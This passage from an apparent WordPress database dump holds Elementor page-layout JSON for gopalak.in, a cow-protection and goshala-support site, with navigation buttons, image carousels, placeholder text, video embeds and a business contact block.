pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10412,1734,'_elementor_page_assets','a:0:{}'),(10414,1735,'_elementor_edit_mode','builder'),(10415,1735,'_elementor_template_type','wp-page'),(10416,1735,'_elementor_version','3.7.8'),(10417,1735,'_wp_page_template','elementor_canvas'),(10418,1735,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10419,1735,'_elementor_page_assets','a:0:{}'),(10424,1737,'_elementor_edit_mode','builder'),(10425,1737,'_elementor_template_type','wp-page'),(10426,1737,'_elementor_version','3.7.8'),(10427,1737,'_wp_page_template','elementor_canvas'),(10428,1737,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 